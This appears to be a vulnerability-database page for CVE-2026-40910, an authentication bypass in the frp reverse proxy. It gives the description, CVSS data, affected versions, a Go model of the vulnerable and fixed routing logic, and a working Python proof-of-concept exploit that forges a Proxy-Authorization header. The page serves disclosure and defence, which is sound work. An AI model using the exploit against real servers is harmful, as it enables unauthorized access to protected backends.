Security Vulnerability Report
CVE-2026-40910 CVSS 6.5 MEDIUM

CVE-2026-40910

Published: 2026-04-21 21:16:45
Last Modified: 2026-04-29 23:20:37

Description

frp is a fast reverse proxy. From 0.43.0 to 0.68.0, frp contains an authentication bypass in the HTTP vhost routing path when routeByHTTPUser is used as part of access control. In proxy-style requests, the routing logic uses the username from Proxy-Authorization to select the routeByHTTPUser backend, while the access control check uses credentials from the regular Authorization header. As a result, an attacker who can reach the HTTP vhost entrypoint and knows or can guess the protected routeByHTTPUser value may access a backend protected by httpUser / httpPassword even with an incorrect Proxy-Authorization password. This issue affects deployments that explicitly use routeByHTTPUser. It does not affect ordinary HTTP proxies that do not use this feature. This vulnerability is fixed in 0.68.1.
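The mismatch the description names, modelled in Go as an added example (this is not frp's code: the route type, the routing table, the backend names, the credentials and the two dispatch functions are this example's own assumptions, and fixedDispatch is one consistent design rather than a claim about what the 0.68.1 patch does). vulnerableDispatch reads the Authorization header for the access check but, for a proxy-style request (absolute-form request line, so the parsed URL has a host), selects the backend by the username in Proxy-Authorization; fixedDispatch resolves the credential source once and uses the same user and password for both the lookup and the check.

```go
package main

import (
	"crypto/subtle"
	"encoding/base64"
	"net/http"
	"strings"
)

// route models one routeByHTTPUser entry under a customDomain (example type,
// not frp's own; field names mirror frpc's httpUser/httpPassword options).
type route struct {
	routeByHTTPUser string // value that selects this backend
	httpUser        string // "" means the backend is not password protected
	httpPassword    string
	backend         string
}

// Constructed routing table for one domain; names and secret are illustrative.
var routes = []route{
	{routeByHTTPUser: "admin", httpUser: "admin", httpPassword: "s3cret", backend: "admin-backend"},
	{routeByHTTPUser: "", backend: "public-backend"},
}

func findRoute(user string) (route, bool) {
	for _, r := range routes {
		if r.routeByHTTPUser == user {
			return r, true
		}
	}
	return route{}, false
}

// parseBasic decodes a "Basic base64(user:pass)" header value.
func parseBasic(v string) (user, pass string, ok bool) {
	raw, err := base64.StdEncoding.DecodeString(strings.TrimPrefix(v, "Basic "))
	if err != nil || !strings.HasPrefix(v, "Basic ") {
		return "", "", false
	}
	return strings.Cut(string(raw), ":")
}

func credentialsOK(r route, user, pass string) bool {
	if r.httpUser == "" && r.httpPassword == "" {
		return true
	}
	return subtle.ConstantTimeCompare([]byte(user), []byte(r.httpUser)) == 1 &&
		subtle.ConstantTimeCompare([]byte(pass), []byte(r.httpPassword)) == 1
}

// vulnerableDispatch reproduces the mismatch: the access check is keyed on
// Authorization, but for a proxy-style request (req.URL.Host is set) the
// backend is selected by the Proxy-Authorization username, whose password
// is never compared against that backend.
func vulnerableDispatch(req *http.Request) (backend string, status int) {
	user, pass, _ := req.BasicAuth() // Authorization header only
	if r, ok := findRoute(user); ok && !credentialsOK(r, user, pass) {
		return "", http.StatusUnauthorized
	}
	routeUser := user
	if pu, _, ok := parseBasic(req.Header.Get("Proxy-Authorization")); ok && req.URL.Host != "" {
		routeUser = pu
	}
	r, ok := findRoute(routeUser)
	if !ok {
		return "", http.StatusNotFound
	}
	return r.backend, http.StatusOK
}

// fixedDispatch chooses the credential source once and uses the same
// user/password pair for the route lookup and the access check.
func fixedDispatch(req *http.Request) (backend string, status int) {
	user, pass, _ := req.BasicAuth()
	if pu, pp, ok := parseBasic(req.Header.Get("Proxy-Authorization")); ok && req.URL.Host != "" {
		user, pass = pu, pp
	}
	r, ok := findRoute(user)
	if !ok {
		return "", http.StatusNotFound
	}
	if !credentialsOK(r, user, pass) {
		return "", http.StatusUnauthorized
	}
	return r.backend, http.StatusOK
}

func basic(user, pass string) string {
	return "Basic " + base64.StdEncoding.EncodeToString([]byte(user+":"+pass))
}

// newRequest builds a proxy-style request (absolute URL) or an origin-form one
// (path only), with optional Proxy-Authorization / Authorization values.
func newRequest(target, proxyAuth, auth string) *http.Request {
	req, _ := http.NewRequest(http.MethodGet, target, nil) // inputs here are well-formed
	if proxyAuth != "" {
		req.Header.Set("Proxy-Authorization", proxyAuth)
	}
	if auth != "" {
		req.Header.Set("Authorization", auth)
	}
	return req
}
```

The attack request is a proxy-style GET for http://app.example.com/ carrying Proxy-Authorization for admin with a wrong password and no Authorization header: vulnerableDispatch returns admin-backend with 200, fixedDispatch returns 401. An origin-form request has no Proxy-Authorization role in either function, which is why the advisory limits the issue to proxy-style requests and to deployments that set routeByHTTPUser.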

CVSS Details

CVSS Score (secondary metric, from the advisory source)
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N

NVD primary metric (from the raw record below)
9.1 CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

The two metrics differ only in attack complexity (High versus Low) and integrity impact (Low versus High); the High attack complexity in the 6.5 vector is consistent with the attacker needing to know or guess the routeByHTTPUser value. Weakness: CWE-287 (Improper Authentication).

Configurations (Affected Products)

cpe:2.3:a:fatedier:frp:*:*:*:*:*:*:*:* - VULNERABLE
frp 0.43.0 through 0.68.0 inclusive (versionStartIncluding 0.43.0, versionEndExcluding 0.68.1); fixed in 0.68.1. Only deployments whose frpc proxies set routeByHTTPUser are exposed; HTTP proxies that do not use that option are not affected.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import base64

import requests

# Exploit for CVE-2026-40910
# Description: Bypass authentication in frp when routeByHTTPUser is used.
# The routing/access-control mismatch only exists for proxy-style requests
# (absolute-URI request line), so the frps HTTP vhost entrypoint is used as an
# HTTP proxy and the protected vhost domain is requested through it.


def exploit_frp_auth_bypass(entrypoint, vhost_url, target_user):
    """
    Attempts to access a protected backend by exploiting the routing logic mismatch.

    entrypoint:  frps HTTP vhost entrypoint (vhostHTTPPort), used as the HTTP proxy
    vhost_url:   URL on the customDomain served by the protected proxy
    target_user: the routeByHTTPUser value of the protected backend
    """
    # Construct the Proxy-Authorization header with the target user and a fake password.
    # The routing logic uses the username from this header to select the backend;
    # on vulnerable versions the password in it is never checked.
    fake_password = "incorrect_password"
    credentials = f"{target_user}:{fake_password}"
    encoded_creds = base64.b64encode(credentials.encode()).decode()

    headers = {
        "Proxy-Authorization": f"Basic {encoded_creds}",
        # The 'Authorization' header is what the access control check reads.
        # Nothing is sent here: the check looks at this header, not at
        # Proxy-Authorization, so the wrong proxy password is never validated
        # against the backend selected for routing.
    }

    try:
        print(f"[*] Requesting {vhost_url} via {entrypoint} as routeByHTTPUser '{target_user}'...")
        # proxies= makes requests send an absolute-URI (proxy-style) request line
        response = requests.get(
            vhost_url, headers=headers, proxies={"http": entrypoint}, timeout=10
        )
        if response.status_code == 200:
            print("[+] Success! Accessed protected backend.")
            print(f"[+] Response length: {len(response.text)}")
        elif response.status_code == 401:
            print("[-] Got 401: the access check was applied; target is likely patched.")
        else:
            print(f"[-] Failed. Status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"[!] Error occurred: {e}")


if __name__ == "__main__":
    # Replace with the actual frps vhost entrypoint, vhost domain and guessed username
    ENTRYPOINT = "http://example-frp.com:8080"  # frps vhostHTTPPort
    VHOST_URL = "http://app.example.com/"       # customDomain of the protected proxy
    USERNAME = "admin"                           # The value of routeByHTTPUser
    exploit_frp_auth_bypass(ENTRYPOINT, VHOST_URL, USERNAME)

References

https://github.com/fatedier/frp/security/advisories/GHSA-pq96-pwvg-vrr9 (Vendor Advisory, Exploit)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40910", "sourceIdentifier": "[email protected]", "published": "2026-04-21T21:16:45.157", "lastModified": "2026-04-29T23:20:37.177", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "frp is a fast reverse proxy. From 0.43.0 to 0.68.0, frp contains an authentication bypass in the HTTP vhost routing path when routeByHTTPUser is used as part of access control. In proxy-style requests, the routing logic uses the username from Proxy-Authorization to select the routeByHTTPUser backend, while the access control check uses credentials from the regular Authorization header. As a result, an attacker who can reach the HTTP vhost entrypoint and knows or can guess the protected routeByHTTPUser value may access a backend protected by httpUser / httpPassword even with an incorrect Proxy-Authorization password. This issue affects deployments that explicitly use routeByHTTPUser. It does not affect ordinary HTTP proxies that do not use this feature. This vulnerability is fixed in 0.68.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fatedier:frp:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.43.0", "versionEndExcluding": "0.68.1", "matchCriteriaId": "2D911E2E-2DC1-4FC1-ABCE-0482EB5D8DD1"}]}]}], "references": [{"url": "https://github.com/fatedier/frp/security/advisories/GHSA-pq96-pwvg-vrr9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/fatedier/frp/security/advisories/GHSA-pq96-pwvg-vrr9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}